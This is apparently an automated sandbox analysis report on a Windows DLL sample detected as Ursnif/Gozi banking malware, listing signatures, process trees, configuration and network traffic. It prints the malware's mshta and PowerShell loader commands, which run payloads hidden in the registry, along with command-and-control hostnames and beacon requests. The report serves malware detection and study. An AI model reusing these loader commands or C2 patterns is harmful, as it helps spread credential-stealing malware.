Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261 (renamed file extension from 19261 to dll)
Analysis ID:351337
MD5:4e62d8a29ba5805407ece642d63df461
SHA1:320f45735c2da0a93359d00ae8d714b48f9c5531
SHA256:ded0afec1ce538699df52daf0e024a3b2965fd0520e9ff4d5a8ed4c141967fb9
Tags:Gozi

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6720 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • rundll32.exe (PID: 6524 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6360 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • SpeechRuntime.exe (PID: 5704 cmdline: C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding MD5: 91858001E25FE5FF6E1C650BB4F24AB0)
  • iexplore.exe (PID: 7068 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5124 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 7084 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 608 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5872 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7048 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5872, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 7048

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://c56.lepini.at/jvassets/xI/t64.datAvira URL Cloud: Label: phishing
            Found malware configurationShow sources
            Source: loaddll32.exe.6720.1.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 8%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,1_2_6D921B50
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: global trafficHTTP traffic detected: GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: unknownHTTP traffic detected: POST /api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 10 Feb 2021 14:15:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.drString found in binary or memory: http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S
            Source: {E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.drString found in binary or memory: http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn
            Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i
            Source: {E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.drString found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG
            Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllString found in binary or memory: https://toldsend.com4

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E1C22 GetProcAddress,NtCreateSection,memset,1_2_6D8E1C22
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E1252 GetLastError,NtClose,1_2_6D8E1252
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E1AD1 NtMapViewOfSection,1_2_6D8E1AD1
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E23C5 NtQueryVirtualMemory,1_2_6D8E23C5
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8E21A41_2_6D8E21A4
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D8FF6101_2_6D8FF610
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D92BA901_2_6D92BA90
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllBinary or memory string: OriginalFilenameGo.dllH& vs SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
            Source: classification engineClassification label: mal100.troj.evad.winDLL@18/24@11/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1BA15B0-6BF5-11EB-90E6-ECF4BB82F7E0}.datJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{6E8265A0-F566-D0CB-EF82-F90493D63D78}
            Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SapiOneCoreServerStartingOrConnecting
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DF051F935A0216EDA8.TMPJump to behavior
            Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
